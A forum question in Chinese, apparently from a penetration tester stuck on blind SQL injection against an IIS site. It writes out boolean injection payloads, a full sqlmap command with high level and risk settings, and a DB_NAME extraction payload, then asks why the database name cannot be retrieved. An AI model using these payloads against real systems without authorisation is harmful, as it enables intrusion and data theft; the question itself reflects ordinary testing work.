在进行渗透测试时,我在一个使用 IIS Web 服务器的网站中遇到了 SQL 盲注。我试过这个有效载荷
" AND 11=11 AND ('Hlua'='Hlua"
它有效并返回成功页面。然后我试了
" AND 11=12 AND ('Hlua'='Hlua"
并返回错误页面。之后我打开 sqlmap 并传递了这个命令
sqlmap -u "https://example.com/popup.aspx?vote=4444" -p "vote" --random-agent --level=5 --risk=3 --dbms="Microsoft SQL Server" --threads=10 --no-cast --current-db -v3
它确认了该漏洞,但是当我尝试检索当前数据库或用户或横幅时,它什么也不返回,当我尝试 --is-dba 它返回 false 这是我使用的有效负载,但它
"') AND UNICODE(SUBSTRING((SELECT DB_NAME()),1,1))>32 AND ('dPwr'='dPwr"
空洞的回应。
即使在sqlmap中也没有防火墙的迹象
我尝试使用
--common-tables/--common-columns
它获取表和列但无法获取数据库名称。
有什么帮助吗?